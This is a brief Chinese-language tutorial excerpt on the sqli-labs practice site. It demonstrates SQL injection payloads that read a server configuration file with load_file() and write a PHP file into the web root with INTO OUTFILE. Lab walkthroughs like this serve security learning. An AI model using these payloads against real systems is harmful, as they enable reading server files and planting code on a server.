- 讀文件:
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,load_file("D:\\phpStudy\\PHPTutorial\\Apache\\conf\\httpd.conf")-- -
在顯示位上顯示apachectl的配置文件的信息
這就是load_file()函數的用法
2.寫文件
http://localhost/sqli-labs-master/Less-7/?id=1')) union select 1,2,"<?php phpinfo();?>" into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\asascccccccd.php"-- -
雖然我們看到了頁面顯示我們語法錯誤,但是我們已經把文件寫入了對應的文件夾位置
在文件夾生成了相應的php文件
